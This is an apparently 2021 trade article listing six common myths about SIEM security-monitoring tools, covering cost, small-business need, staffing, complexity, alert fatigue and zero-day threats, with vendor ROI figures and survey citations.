6 SIEM Myths to Avoid to Strengthen Your Organization’s Cybersecurity

Security information and event management or SIEM is an essential part of any company’s security posture. It scans your system indicators, checks for anomalies, and flags any warning sign that could potentially imply a security risk (i.e., a vulnerability that could be exploited in the future) or a security breach (i.e., a deliberate/inadvertent compromise that’s already happened). Typically, SIEM systems leverage automation to act on these red flags with minimal human intervention. Some even apply artificial intelligence (AI) to better correlate system data and make more accurate predictions. 

In 2021, in spite of being a relatively mature market, SIEM continues to grow at a rapid pace and will reach $3.94 by 2024. There are plenty of options to choose from (on-premise, SaaS, as well as on a private cloud), and Infosec leaders must carefully govern their implementations to extract maximum value. Particularly in the wake of COVID-19 and the associated spike in attacks, you need to ensure your SIEM strategy is carefully calibrated, keeping in mind the pragmatic, on-ground reality of today’s complex threat landscape.

Let us look at six popularly talked about SIEM myths – unraveling why they no longer apply and how you could address them. 

Learn More: Your 6-Point Guide for Evaluating Next-Gen SIEM Tools  

1. MYTH – Small businesses do not require SIEM

FACT – Every business with a networked digital infrastructure needs SIEM

Small businesses often believe that:

1. 1. They aren’t big enough of a target to attract hackers’ attention
   2. Incoming threats are simple/few in number; a manual Infosec team can handle them 
   3. They can keep their small workforce on a tight leash and control the risk vector

In reality, this attitude makes small and mid-sized businesses a soft target for cybercriminals. Further, it is much harder for an SMB to make payouts (in terms of penalties or ransom) than a large enterprise in case of a breach. The U.S. National Security Alliance reportsOpens a new window that only 14% of small businesses believe their ability to mitigate cyber risk and vulnerabilities is effective despite admitting that a single data breach could cost them $10,000.

SMBs must reinforce their security infrastructure in 2021, and a big part of it is investing in SIEM. The good news is SaaS SIEM solutions and low-cost managed service offerings have reduced the barriers to entry significantly.

Learn More: 3 Steps for CISOs to Get More Out of SIEM Tool  

2. MYTH – SIEM costs more than the value it provides

FACT – SIEM offers impressive ROI and must be deployed correctly

In the early days, SIEM implementations involved a high CAPEX and an even higher OPEX and you’d need to build a bespoke solution, integrate with every node of your digital infrastructure, update it at regular intervals to keep pace with business growth, appoint a large team to act on alerts, and buy hardware to host the entire system. Fortunately, the days of legacy, expensive SIEM is over (even if the myth remains), and organizations now have competitive SIEM offerings at every price bracket, promising measurable ROI.

For example, Forrester’s Total Economic Report suggests that IBMs QRadar SIEM solution has an ROI of 35%Opens a new window , while Azure Sentinel brings in a whopping 201%Opens a new window ROI over three years. 

The key is setting the right value-generating timelines (mid to long term), opting for SaaS/cloud solutions, and augmenting security training to address the risk of human errors that could offset your SIEM benefits.

3. MYTH – SIEM is a set-and-forget solution

FACT – SIEM improves but does not replace human efforts

SIEM systems typically contain a high degree of automation. A rules-based automation engine can tackle common alerts while AI makes decisions on more unusual exceptions. But this doesn’t mean you no longer need a human in the loop. A 2020 industry surveyOpens a new window revealed that just 5% of security leaders expect a reduction in staffing due to SIEM. Many intend to increase human efforts as SIEM lowers their overall security costs and frees up resources to focus on more specialized tasks.

When implementing SIEM, organizations must upskill their Infosec team to:

1. 1. Configure and update alert handling mechanisms regularly
   2. Analyze and remediate the root cause using advanced threat modeling tools
   3. Provide security awareness training to the workforce

If in-house resources are scarce, a managed services provider can monitor SIEM operations and remotely tweak configurations as needed. 

4. MYTH – SIEM complexities are overwhelming

FACT – Modern SIEM tools have a steep learning curve and come with stellar support

It’s true that the underlying complexity of systems – any system – increases with their evolution. Just as your basic modern-dar car is much more complex than a Ford Model T, the same applies to SIEM as well. However, the underlying functionality is effectively black-boxed and users (i.e., your Infosec team) need only navigate user-facing interfaces, dashboards, and GUI configurations.

Today, SIEM comes with a steep learning curve, where you can start using solutions almost out-of-the-box – thanks to native integrations and business dashboards. Vendors also support customers at every step of the way, with a solution packaging of their choice (custom, turnkey, tailored, remote cloud-based, etc.) and also offer user training. 

For example, Microsoft has a series of video tutorialsOpens a new window for Azure Sentinel customers. Peer insights and reviews on GartnerOpens a new window also debunk this myth, as customers say SIEM is “fairly easy to start using”, “immediately reliable”, “clearly demonstrating value and ease of use”, “finding possible incidents from day one”, and “available straight out of the box” – to name a few.

5. MYTH – All SIEM alerts call for the same degree of investigation

FACT – Alert baseline must be regularly adjusted to avoid false positives

One of the major points of hesitation regarding SIEM adoption is that it can cause alert fatigue. Indeed, according to a recent surveyOpens a new window , 70% of companies have seen their alert volumes at least double in the past five years, while 83% face alert fatigue. That’s why it is so important to let go of the “all alerts need equal investigation” mindset and start prioritizing your backlog. Otherwise, there is a risk that critical alerts will slip through in a wave of false positives and the Infosec team would be unable to detect threats in real-time.

AI-powered, cloud-based SIEM offers an answer to this challenge as:

1. 1. The vendor would continuously collect threat intelligence data from its global solution instances and keep updating your alert baselines remotely.
   2. AI could form smart correlations using large volumes of system, device, and user information to filter out most of the false positives and focus on the alerts that matter.

It is useful to prioritize the alert backlog into buckets that need immediate remediation, are resolved through automation, and require future analysis. 

Learn More: Top Vendors Pushing the Boundaries of SIEM 

6. MYTH – SIEM cannot protect against zero-day attacks

FACT – The implementation must follow best practices for zero-day protection

It is a common misconception that as SIEM doesn’t protect against new or publicly unknown zero-day threats, it isn’t worth investing in it. 

In reality, SIEM will flag vulnerabilities and anomalous device/user behavior in all attack scenarios, including completely unknown threats. While it is true that zero-day vulnerabilities introduced due to incorrect software upgrades and delayed patches can slip under the radar, SIEM can find system information resulting from these vulnerabilities and alert your team. StudiesOpens a new window suggest over a quarter of companies use SIEM to combat zero-day attacks. 

It is advisable to follow a few best practices to ensure your SIEM is zero-day ready. First, SIEM should collect raw system information and convert it – in real-time – into actionable information. Second, log data centralization can help you triage and form accurate correlations. Finally, a use case database will help analysts get to the root cause of unusual alerts and determine if there is a zero-day threat. Real-time data processing at scale, centralization, and use case repositories are the features you need in SIEM.

As you can see, the conversation around security information and event management or SIEM is incredibly nuanced, fraught with misconceptions and myths as much as there is immense potential. Infosec leaders must review the SIEM options available to them based on the hosting environment, remote and on-site support, global threat intelligence, correlation techniques, and ease-of-use to extract maximum value from your investment. 

Ultimately, SIEM solutions return outsized and incremental value over a period of time, and given today’s threat landscape and range of options; it is a no-brainer for organizations of every size. 

What are your top concerns around investing in SIEM in 2021? Comment below or let us know on LinkedInOpens a new window , TwitterOpens a new window , or FacebookOpens a new window . We would love to hear from you!